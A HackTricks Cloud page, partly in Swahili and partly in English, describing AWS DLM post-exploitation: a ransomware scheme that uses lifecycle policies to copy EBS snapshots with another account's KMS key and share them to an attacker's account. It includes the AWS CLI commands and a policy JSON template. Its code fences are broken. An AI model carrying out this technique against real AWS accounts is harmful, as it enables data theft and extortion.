Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - DLM Post Exploitation

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Meneja Maisha ya Data (DLM)

EC2:DescribeVolumes, DLM:CreateLifeCyclePolicy

Shambulio la ransomware linaweza kutekelezwa kwa kuchagua kama vile EBS volumes iwezekanavyo na kisha kufuta mifano ya sasa ya EC2, EBS volumes, na snapshots. Ili kiotomatiki shughuli hii ya uovu, mtu anaweza kutumia Amazon DLM, kwa kuchagua snapshots na kufanya nao encryption na kufanya uhamisho wa snapshots zilizo encrypt kwa kutumia KMS key kutoka akaunti nyingine ya AWS na kuzihamisha snapshots zilizo encrypt kwenda akaunti tofauti. Vinginevyo, wanaweza kuhamisha snapshots bila encryption kwenda kwenye akaunti wanayoimiliki na kisha kuzi encrypt hapo. Ingawa si rahisi kufanya encryption kwa EBS volumes au snapshots zilizopo moja kwa moja, inawezekana kufanya hivyo kwa kuunda volume au snapshot mpya.

Kwanza, mtu atatumia amri kukusanya taarifa kuhusu volumes, kama vile ID ya mifano, ID ya volume, hali ya encryption, hali ya kiambatisho, na aina ya volume. aws ec2 describe-volumes

Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs.

```swahili
aws dlm create-lifecycle-policy --description "Sera yangu ya kwanza" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json

A template for the policy document can be seen here:
```bash
```json
{
"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
"ResourceTypes": [
"VOLUME"
],
"TargetTags": [
{
"Key": "ExampleKey",
"Value": "ExampleValue"
}
],
"Schedules": [
{
"Name": "DailySnapshots",
"CopyTags": true,
"TagsToAdd": [
{
"Key": "SnapshotCreator",
"Value": "DLM"
}
],
"VariableTags": [
{
"Key": "CostCenter",
"Value": "Finance"
}
],
"CreateRule": {
"Interval": 24,
"IntervalUnit": "HOURS",
"Times": [
"03:00"
]
},
"RetainRule": {
"Count": 14
},
"FastRestoreRule": {
"Count": 2,
"Interval": 12,
"IntervalUnit": "HOURS"
},
"CrossRegionCopyRules": [
{
"TargetRegion": "us-west-2",
"Encrypted": true,
"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
"CopyTags": true,
"RetainRule": {
"Interval": 1,
"IntervalUnit": "DAYS"
}
}
],
"ShareRules": [
{
"TargetAccounts": [
"123456789012"
],
"UnshareInterval": 30,
"UnshareIntervalUnit": "DAYS"
}
]
}
],
"Parameters": {
"ExcludeBootVolume": false
}
}

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
PreviousAWS - Control Tower Post ExploitationNextAWS - DynamoDB Post Exploitation

Last updated